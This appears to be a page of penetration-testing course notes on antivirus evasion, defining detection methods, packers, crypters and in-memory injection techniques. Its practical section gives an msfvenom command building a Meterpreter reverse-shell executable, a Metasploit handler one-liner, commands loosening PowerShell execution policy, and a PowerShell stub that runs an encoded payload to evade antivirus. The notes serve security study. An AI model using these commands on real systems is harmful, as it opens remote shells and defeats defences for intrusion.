Module 17 (Antivirus Evasion)

Methods of Detection Malicious code

  • Signature-Based Detection

  • Heuristic-Based Detection

  • Behavioral-Based Detection

Bypassing Antivirus

  • On-Disk Evasion

    • packers

    • Obfuscators

    • Crypters

    • Software Protectors

  • In-Memory Evasion

    • Remote Process Memory injection

    • Relective DLL Injection

    • Process Hollowing

    • lnline hooking

Methods of Detecting Malicious Code

Signature-Based Detection

  • Identifies known malware based on predefined signatures.

Heuristic-Based Detection

  • Analyzes the behavior of code to identify potential threats based on heuristics.

Behavioral-Based Detection

  • Examines the behavior of code during execution to identify suspicious activities.

ON-Disk Evasion

Packers

  • Tools that compress or encrypt executable files to obfuscate their content.

Obfuscators

  • Techniques that obscure the code's logic and structure to make it harder to analyze.

Crypters

  • Tools that encrypt executable files to evade signature-based detection.

Software Protectors

  • Programs that protect executable files from analysis and tampering.

In-Memory Evasion

Remote Process Memory Injection

  • Injecting code into the memory space of a remote process.

Reflective DLL Injection

  • Loading a DLL into a process's memory without putting it on disk.

Process Hollowing

  • Creating a new suspended process and replacing its memory space with malicious code.

Inline Hooking

  • Modifying function pointers to redirect execution flow.

Practical

Manual

Avira Free V 15.0.34.16

Simple reverse shell binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe > binary.exe

Power shell ExecutionPolicy

powershell Get-ExecutionPolicy -Scope CurrentUser 
powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
powershell Get-ExecutionPolicy -Scope CurrentUser

metasploit one line command

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LPORT 4444; set LHOST 192.168.1.6"

Powershell AV bypass payload

$jHs = '<BASE64_ENCODED_PAYLOAD>'
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($jHs))
$TmU = "-e "
if([IntPtr]::Size -eq 8){
    $YZfX = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell"
    iex "& $YZfX $TmU $e"
} else {
    iex "& powershell $TmU $e"
}

Tools

  • Shellter

  • the fat rat

  • Empire

  • veil

PreviousModule 16 (File Transfers)NextWindows

Last updated